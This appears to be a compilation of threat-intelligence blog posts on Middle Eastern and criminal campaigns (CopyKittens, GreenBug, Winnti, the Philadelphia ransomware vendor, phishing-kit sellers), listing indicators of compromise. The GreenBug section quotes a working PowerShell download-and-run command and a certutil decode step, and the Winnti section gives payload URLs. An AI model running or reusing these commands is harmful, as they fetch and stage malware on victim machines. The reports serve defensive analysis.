In a report that covers other parts of the campaign, Mcafee attribute it to Gaza Cybergang (AKA Gaza Hacker Team AKA  Molerats). However, the report does not present strong evidence to support this conclusion.

While initially we thought the same, currently we cannot relate Operation Electric Powder to any known group. Moreover, besides Mohamad potentially being the name of the malware developer (based on PDB string found in multiple samples:  C:\Users\Mohammed.MU\Desktop\AM\programming\C\tsDownloader\Release\tsDownloader.pdb
), we do not have evidence that the attackers are Arabs.

Indicators of compromise

• Indicators file:  Operation-Electric-Powder-indicators.csv (also available on PassiveTotal).
  Notably, all but one of the IP addresses in use by the attackers belong to German IT services provider “Accelerated IT Services GmbH” (AS31400):
  84.200.32.211
  84.200.2.76
  84.200.17.123
  84.200.68.97
  82.211.30.212
  82.211.30.186
  82.211.30.192
• Florian Roth shared a Yara rule to detect the downloader: Operation-Electric-Powder-yara.txt
• The graph below depicts the campaign infrastructure (click the image to see the full graph):
  
• Live samples can be downloaded from the following link:
  https://ln.sync[.]com/dl/30e722bf0#f72zgiwk-zxcp3e9t-fa9jyakr-zpbf5hgg
  (Please email info@clearskysec.com to get the password.)

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research.

On 29 March 2017 the German Federal Office for Information Security (BSI) said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party. Below is a Google translation of the statement:

“After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks. Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag. At the request of the German Bundestag the BSI analyzed these problems in network traffic. The technical analyzes have been completed. The website of the Jerusalem Post was manipulated and linked to a harmful third party. Within the framework of the analyzes, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.”

As part of our monitoring of Iranian threat agents activities, we have detected that since October 2016 and until the end of January 2017, the Jerusalem Post, as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens.  Based on the time-frame and nature of the compromises, we estimate with high certainty that the statement by German Federal Office for Information Security refers to the same incidents.

Watering hole attacks

In each of the compromised websites, the attackers inserted a single line of Javascript code into an existing Javascript library (a local library, loaded from the server hosting the compromised website). This code loaded further Javascript from a malicious domain owned by the attackers:

jguery[.]net
Specifically from this URL: https://js.jguery[.]net/jquery.min.js

Note that the domain is intentionally impersonating jquery.com, a legitimate and unrelated domain used by Jquery, one of the most prevalent Javascript libraries.

Below are screenshots of infected website’s source code showing jguery[.]net being loaded (click images to enlarge).

Jerusalem post website (www.jpost.com):

Maariv – website of a national daily newspaper published in Israel (www.maariv.co.il)

The Israeli Defense Force Disabled Veterans Organization website (inz.org.il)

The Palestinian Ministry of Health (www.moh.gov.ps)
(loaded a from a similar malicious domain – jguery[.]online):

The student personal info log-in page of Tel Aviv University (www.ims.tau.ac.il)
This was captured by PassiveTotal as can be seen in the screenshot below or in the following analysis page: https://passivetotal.org/search/jguery.net.

By the time we examined the website the malicious code was removed.

Javascript payload

As can be seen in this public analysis, the malicious Javascript payload loaded from jguery[.]net and jguery[.]online was BeEF, The Browser Exploitation Framework Project, an open source “penetration testing tool that focuses on the web browser”.

The Javascript payload was not served to each and every visitor of the infected websites. Based on our analysis and other indications, we estimate that the attackers used whitelisting, likely based on source IP.  This means that only specific targets would be effected and potentially compromised. However, because we did not have access to the servers hosting the malicious Javascript payload, we do not know what was the exact logic for it being served.

Source of the compromise?

While monitoring online hacking communities, we identified that in October 2016 an actor sold access to the management panel of a server belonging to an Israeli hosting company. This server hosted the Jerusalem Post and Maariv, among other websites.

We estimate with medium certainty, that the attackers bought  access to the server in order to deploy the malicious code.

Indicators of compromise

Indicators file:  copykittens-indicators-March-2017.csv (also available on PassiveTotal).

Other parts of this campaign were revealed recently by Domaintools.

Domains in use by CopyKittens:

1e100[.]tech
1m100[.]tech
ads-youtube[.]online
akamaitechnology[.]com
alkamaihd[.]net
azurewebsites[.]tech
broadcast-microsoft[.]tech
chromeupdates[.]online
cloudmicrosoft[.]net
dnsserv[.]host
elasticbeanstalk[.]tech
fdgdsg[.]xyz
jguery[.]net
jguery[.]online
js[.]jguery[.]online
microsoft-ds[.]com
microsoft-security[.]host
nameserver[.]win
newsfeeds-microsoft[.]press
owa-microsoft[.]online
primeminister-goverment-techcenter[.]tech
qoldenlines[.]net
sharepoint-microsoft[.]co
ssl-gstatic[.]online
static[.]primeminister-goverment-techcenter[.]tech
trendmicro[.]tech

Over the past few months ClearSky has been collaborating with Palo Alto Networks on preventing and detecting targeted attacks in the Middle East using two relatively new Microsoft Windows malware families which we call KASPERAGENT and MICROPSIA. In addition, our research has uncovered evidence of links between attacks using these two new malware families and two families of Google Android malware we are calling SECUREUPDATE and VAMP.

Read the full report at Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA.

ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that develop and sell malware, exploits, bots and ransomware.

We have recently encountered very aggressive jabber spam campaign, advertising the “Philadelphia” ransomware.

As Brian Krebs wrote in one of his recent post,  Philadelphia is  a ransomware-as-a-service crime ware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires. Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.[1]

This is a screenshot of the jabber spam campaign:

In his post from March, Brian Krebs described the highly professional YouTube movie[2] advertising this Ransomware.

In addition to this movie, a professional and well-designed website was created by Philadelphia vendor in February 2017:

This website advertises both the Philadelphia and Stampado Ransomware, but also advertises other services and tools that are provided by the same person:

1. CyanoBinder – File Joiner that allows to join multiple files into only one executable file (the price is 14$ for unlimited license)
2. SkypeBomber – a tool that conducts phone DDOS, using Skype to call a specific number repeatedly (the price is 29$ for unlimited license)
3. V-Eye – a RAT that includes keylogger that collect passwords, and control mouse, watch webcam or desktop, send and retrieve files and more (the price is 239$ for unlimited license).
4. RemoTV – an application that bundles and opens a hidden modified TeamViewer application on a machine and sends the credentials to you (the price is 49$ for unlimited license)
5. Mailer – PHP script that allows you to send e-mails to multiple addresses at once (the price is 9$ for unlimited license)

In comparison to other vendors in cybercrime markets, the prices are relatively low.

While checking the information of the domain of the “store” in we were able to find traces about other activities of this malware provider that allows us to connect him to Brazil.

The common assumption, till now, was that the vendor that is behind Philadelphia ransomware[3], is Russian cybercriminal. But based on those findings and the fact that the communication language of the vendor, in one of the main Russian cybercrime forums, is English, we can assume  that the vendor is potentially Brazilian.

In the Diagram below, we have uncovered the connections of the registrants information behind the website :

As we can see in the above diagram and using “Passive Total” with reverse whois search on the registrar e-mail (rubens_alexandre_mar@hotmail.com), during  2016 he registered 4 other domain names, three out of them with the name Viracopos:

Viracopos is an international airport in São Paulo, Brazil, which has a legitimate website under the domain viracopos.com. So we can assume that the malware vendor conducted in 2016 some kind of phishing activity connected to the Viracopos airport.

Below is the registration information for the above domain names, as we can see, there was use of legitimate people names:

Rainer Brust details:

Rita J Kula details:

Pivoting the IP on which the main website of the vendor is hosted, we found a mirror website to the main website that was registered in May 2016 and was active till last week:

This phone number (as well as the registrant name and e-mail) is connected to a huge network of more than 1000 domains that were registered during 2016 and are unavailable now.

Using the Domain Tools Risk Score engine we can see that with high probability all those domains were malicious:

Also checking the registrant mail (rajsingh01114@gmail.com) we see that the 490 abuses that were reported against domain names registered with this e-mails[4] :

Conclusions

From this research we can learn the following:

1. Philadelphia vendor is expanding his activity and investing a lot of efforts in marketing.
2. This vendor run during 2016 a huge network of malicious websites, and probably conducted specific phishing activity connected to Viracopos airport.
3. We assume, with high probability, that the malware vendor of Philadelphia is not Russian, we assess with moderate probability that the vendor is Brazilian.

Indicators of compromise 

viracopos.me
viracopos.club
viracopos.biz
whitecor.com
80.82.69.139
rubens_alexandre_mar@hotmail.com
rajsingh01114@gmail.com
918989616042

[1] https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/

[2] https://www.youtube.com/watch?v=5WJ2KHoo5Fo

[3] https://blog.vadesecure.com/en/raas-ransomware-as-a-service/

[4] http://knujon.com/owners/rajsingh01114@gmail_com.html

On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199. By pivoting off of the infrastructure we learned that it is related to Winnti, a Chinese threat actor that is mostly targeting the gaming industry. Below we outline initial findings.

The malicious file, named curriculum vitae.rtf (58c66b3ddbc0df9810119bb688ea8fb0) was uploaded from Turkey. Its content is presented below (we redacted personally identifiable information):

When the document is opened, it downloads and runs a file from the following URL:

http://54.245.195[.]101/test.rtf

Which contains a short VBS script:

The script downloads and runs an executable (a4b2a6883ba0451429df29506a1f6995) from the following URL:

http://54.245.195[.]101/shell.exe

Which uses backup.aolonline[.]cc as command and control server.

Indicators of compromise

Pivoting on IPs, code signing certificates, and domain registration details, we found further parts of the infrastructure, some got back to 2015. Most of them have been tagged as relating to “Casper aka LEAD” in a public PassiveTotal project by Cylance (However, we could not find a public report). Most sample were detected by Proofpoint as “ETPRO TROJAN Casper/LEAD DNS Lookup” (this signature was published in May 03, 2017).

The Maltego graph below depicts the relationship among the indicators (click to enlarge):

The indicators are available on PassiveTotal.

CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015, ClearSky and Minerva Labs published the first public report exposing its activity [1]. In March 2017, ClearSky published a second report exposing further incidents, some of which impacted the German Bundestag [2].

In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active. It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group’s modus operandi. We dubbed this activity Operation Wilted Tulip.

Targetting

CopyKittens is an active cyber espionage actor whose primary focus appears to be foreign espionage on strategic targets. Its main targets are in countries such as Israel, Saudi Arabia, Turkey, The United States, Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees.

Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks.

For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in Israel.

Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments. Fake Facebook profiles have been used for spreading malicious links and building trust with targets. Some of the profiles have been active for years.

Malware

CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a self-developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with similar functionality.

The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.

A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration. This feature is available both in Cobalt Strike and in Matryoshka.

Most of the infrastructure used by the group is in the U.S., Russia, and The Netherlands. Some of it has been in use for more than two years.

Read the full report: Operation Wilted Tulip
Indicators of compromise: indicators-wilted_tulip.csv (also available on PassiveTotal)
Yara rules: yara-apt_wilted_tulip.txt (courtesy of Florian Roth) 
Samples:  Live samples can be downloaded from the following link:
https://ln.sync[.]com/dl/f6772eb20/d8yt6kez-9q7eef3m-ai27ebms-8zcufi5f (Please email info@clearskysec.com to get the password.)

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research.

[1] http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/
[2] http://www.clearskysec.com/copykitten-jpost/

The main aim of this research is to understand and describe the eco-systems of fake websites developers and designers, and the basic economy behind creation of fake websites that impersonate legitimate websites of banks, credit cards companies and corporations. Mostly, the aim of those fake websites is stealing credential (banking or corporate) or credit cards information.

As part of this research we checked dozens of popular Russian and English-speaking underground boards and forums, looking for vendors’ topics that provide services of fake webpages creation.  On the second stage, when it was available, we conducted HUMINT operation and made a direct contact with those cybercrime vendors of fake sites via instant messaging (mostly jabber) to get deeper understanding of their skills, works and pricing.

Totally, we have checked about 15 different phishing vendors, when the main criteria were the skills of the vendor, the prices and how he makes the fake site.

We have checked a price for two main types of fake sites:

1. Banking login page that is similar to real one – when the aim is to steal the login and the password to banking account.
2. Second stage to the banking login page in order to steal additional information – page that do not exist in real bank website and asks the user to enter their credit cards number, expiration date and CVV number.

In addition, we have checked whether the vendors are just duplicating the original website, or developing it from scratch/partially.

Why does it matter? – Because mostly the duplicated websites are being exposed and taken down quicker, and as one vendors (Vendor9) told us – duplicated websites, in many cases are being blocked by Chrome/Safari:

Some of the vendors (like Vendor5), also add some kinds of filters to prolong the time of the fake website till it is being exposed:

We have seen that some of the vendors, mostly the more qualified ones are aware of those issues and mention it in the conversation, while the lower quality “developers”, or in other words the script kiddies who try to earn money don’t even understand what is the difference between just duplicate a website and develop a fake from scratch. To note, that some of the vendors, duplicate the website and make basic “cleaning” i.e. basic changes in HTML and content.

Below is a table that summarizes the key points of the research (to note that in the public version of this report we censored the nicknames of the vendors. This is done for the purpose of not promoting them):

We can see that there are two different types of professionals who are required to fake websites creation: the developers and the designers. Some of the fake websites service providers, who are developers, work with 3^rd party designers when a design / change in the websites is required. We can see it from our conversation with one of the vendors named “Vendor2”:

From pricing point of view, the average price for banking login page is about 60$, when the pricing is mostly divided into two groups, those who just duplicate the original site mostly price it at about 20-30$ and those who develop the fake website from scratch price it at 50$ or more, when some of the vendors ask about 150-200$ for their work.

When we asked for pricing for additional page that not exist at real websites, for grabbing and stealing credit cards data, in some cases the price was significantly raised because this additional page required some development and design work, and not just duplicating existing page.

Some of the fake sites vendors, also develop different tools and panels that allow them to collect in a proper and comfortable way the stolen credentials and offering it for additional payment to fake websites buyers.

One of the additional services that some vendors offer is control panels that allow collecting all the required data and log in convenient manner.

One panel is introduced and beign sold by “Vendor3”:

Another one is built and developed by “Vendor5”:

Most of the vendors, work very hard to promote their services, constantly pump up their topics in different forums, and although the basic pricing of most of them is relatively low, in order to gain proper reputation, they offer various kinds of actions and discount.

For example, one of the young leading vendors of the last year, “Vendor1”, offered free creation of fake websites for TLD .de for limited time:

This quotation, as well as most of the quotations, and conversations with the vendors, was originally in Russian, and were translated, edited and redacted when it was necessary, while we tried to keep the essence of the chat and the language level as near to the original as it was possible.

In terms of time, there are vendors who are ready to conduct their work in timeframe of ten minutes or within an hour, but there are vendors who ask for several days.

Some of the vendors also publish colorful advertisements:

As they are acting as service providers, most of the vendors are very polity and patient to answer any questions that potential clients have (even too polite):

One of the vendors we had a conversation with, mentioned also some interesting points about creating good banking fakes:

In this research, we present in depth the vendors, their modus operandi and pricing and examples of their previously done works.

Read the full report:  The Economy behind Phishing Websites Creation

For full, uncensored version of report – email info@clearskysec.com

Recently we detected new samples and Infrastructure of ISMAgent,  a trojan in use by Iranian Threat Group GreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate and decoded via certutil.exe. This post describes the new campaign.

change managment.dot

Sample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the following URL:

http://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf

which in turn runs this command:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object http://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force

The command downloads ntluca.txt from http://a.pomf[.]cat/ntluca.txt.

Disguised as  a base64 digital certificate, the file actually decodes to an ISMagent sample (96b47c5af8652ac99150bf602a88498b) via the following command:

C:\Windows\System32\certutil.exe” -decode C:\Users\USER\AppData\Roaming\srvRep.txt C:\Users\USER\AppData\Roaming\srvConhost.exe

Indicators of compromise

Indicators of compromise are presented below and are available on PassiveTotal.

The Maltego graph below depicts the relationship among the indicators (click to enlarge):

Iranian Threat Agent Greenbug  has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies.

On 15 October 2017 a sample of ISMdoor was submitted to VirusTotal from Iraq.  The sample name was WmiPrv.tmp (f5ef3b060fb476253f9a7638f82940d9) and it had the following PDB string:

C:\Users\Void\Desktop\v 10.0.194\x64\Release\swchost.pdb

Two domains were used for command and control:

thetareysecurityupdate[.]com
securepackupdater[.]com

By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent. Eight contain the name of Israeli high-tech and cyber security companies and one of a Saudi Arabian testing & commissioning of major electrical equipment company.

We estimate that the domains were registered in order to be used when targeting these companies, organisations related to them, or unrelated third parties. However, we do not have any indication that the companies were actually targeted or otherwise impacted.

Below are the malicious domains and the companies who’s names were used.

Indicators of compromise

Indicators of compromise are presented below and are available on PassiveTotal.

The Maltego graph below depicts the relationship among the indicators (click to enlarge):

Update 2017-10-25 – three hashes removed from IOC list

The following hashes were mistakenly included in the IOC list and have been removed, as they are unrelated to the campaign:
c594b52ec8922a1e980a2ea31b1d1157
179cb8839e9ee8e9e6665b0986bf7811
d30c4df6de21275ae69a4754fc2372ef